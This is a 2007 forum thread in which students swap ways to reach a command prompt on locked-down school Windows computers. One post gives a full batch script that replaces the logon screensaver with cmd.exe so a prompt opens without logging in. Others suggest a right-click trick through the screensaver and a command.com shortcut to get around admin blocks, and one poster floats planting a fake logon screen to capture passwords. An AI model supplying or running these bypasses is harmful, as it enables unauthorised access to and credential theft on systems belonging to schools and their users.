Got On CMD

Discuss it here

Moderators: Community Moderators, Veterans - RM Community

Forum rules
RM Specific Disclaimer: Users should be advised that any software files, modifications, upgrades, plugins etc are property of the poster.
Xatrix Security do not accept ownership of these files nor do we accept liability for any copyright violations.
Xatrix Community Guidelines: Click Here
trix909

Got On CMD

Post by trix909 » Sat Nov 10, 2007 12:16 am

I managed to get on CMD without being logged on by using the screensaver when your not logged in.
But when I try "Net send /users hi" it says access is denied or when i try make a new account via cmd. Anyone know how to get round Access is denied

TJ_2k7

Re: Got On CMD

Post by TJ_2k7 » Sat Nov 10, 2007 11:14 am

At my school you can only use cmd w when you're logged on as a teacher account.
I can get on cmd on my student account but it does like what happened 2 you.
ACCES IS DENIED!
At the moment i don't think there is around this except get a teacher account....
:mrgreen:

jd2kuk

Post by jd2kuk » Sat Nov 10, 2007 12:25 pm

How exactly did you get onto the command prompt without being logged on? I'm intrigued lol...

TJ_2k7

Post by TJ_2k7 » Sat Nov 10, 2007 12:48 pm

jd2kuk wrote:How exactly did you get onto the command prompt without being logged on? I'm intrigued lol...

The the temp thing
all you do is replace the screensaver with commmand prompt so when the login screen is up and the screen saver is about to load the computer loads cmd!

open a .txt file and type
cd\
cd\windows\system32
mkdir temphack
copy cmd.exe temphack\cmd.exe
copy logon.scr temphack\logon.scr
del logon.scr
reanme cmd.exe logon.scr
exit
(go to save as and save as a .bat file)
after double click this file, it will execute.
what you have done is changed the screen saver at the logon screen to a command prompt. logoff sit for about ten minutes, the screen saver will boot but it will be a command prompt when you get the command prompt type
:mrgreen: :mrgreen:

trix909

Post by trix909 » Sat Nov 10, 2007 2:45 pm

When the screensaver is up right click, then it says right click is disabled. then press enter and right click until it comes up with the right click options then press open link in new window

TJ_2k7

Post by TJ_2k7 » Sat Nov 10, 2007 3:17 pm

trix909 wrote:When the screensaver is up right click, then it says right click is disabled. then press enter and right click until it comes up with the right click options then press open link in new window
I thought u used the temphack thing... :)
Didn't no that worked aswelll :!:

Phantom

Post by Phantom » Sat Nov 10, 2007 10:43 pm

i managed to get CMD just by using a shortcut, but unfortunatly it just says "CMD has been blocked my admin press any key to exit..." which is a pain. And my school has blocked .bat files from being run :(

TJ_2k7

Post by TJ_2k7 » Sun Nov 11, 2007 11:57 am

Phantom wrote:i managed to get CMD just by using a shortcut, but unfortunatly it just says "CMD has been blocked my admin press any key to exit..." which is a pain. And my school has blocked .bat files from being run :(

That happened to me and my school.
Try a shortcut to 'command.com' :) (without quotes)

jd2kuk

Post by jd2kuk » Sun Nov 11, 2007 9:28 pm

I never thought of that, that's an ace method! :D

And now I think about it, I can create an exe to do pretty much anything I like, and have it run at logon... like a fake logon screen :P

TJ_2k7

Post by TJ_2k7 » Mon Nov 12, 2007 7:00 pm

jd2kuk wrote:I never thought of that, that's an ace method! :D

And now I think about it, I can create an exe to do pretty much anything I like, and have it run at logon... like a fake logon screen :P
Which way...
The temphack or right click thing.......?